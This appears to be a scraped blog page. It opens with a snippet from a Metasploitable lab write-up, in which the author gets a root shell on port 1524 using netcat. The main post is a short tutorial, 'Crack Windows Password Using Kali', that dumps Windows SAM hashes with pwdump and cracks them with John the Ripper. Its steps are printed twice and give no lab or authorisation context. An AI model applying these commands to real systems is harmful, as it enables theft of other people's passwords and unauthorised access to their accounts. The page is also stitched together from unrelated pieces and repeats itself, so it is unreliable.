Metasploitable Root shell 1524/tcp open shell Metasploitable root shell This was a curiousity… My first attempt was to attempt using rlogin to connect to the port, which did not appear to work correctly, though did seem to work enough to return part of a prompt to the user: root@kali:~# rlogin -p 1524 target oot@metasploitable:/# My next approach was to attempt a simple netcat connection to the host, which ended up being successful: root@kali:~# nc -v target 1524 root@metasploitable:/# id ...
Crack Windows Password Using Kali
Step 1 - Open Terminal
Type - pwdump
" It Will Give U hint " how to use
Step 2 - pwdump <SYSTEM FILE > <SAMFILE>
Step 3- Copy Hash File And Paste It in A Text File Using Nano Editor
Step 4 - john --format=LM/NTLM <text file>
After Cracked You can see Using
john --show --format=LM <Txt File>
Step 1 - Open Terminal
Type - pwdump
" It Will Give U hint " how to use
Step 2 - pwdump <SYSTEM FILE > <SAMFILE>

Step 3- Copy Hash File And Paste It in A Text File Using Nano Editor

Step 4 - john --format=LM/NTLM <text file>

After Cracked You can see Using
john --show --format=LM <Txt File>
Comments
Post a Comment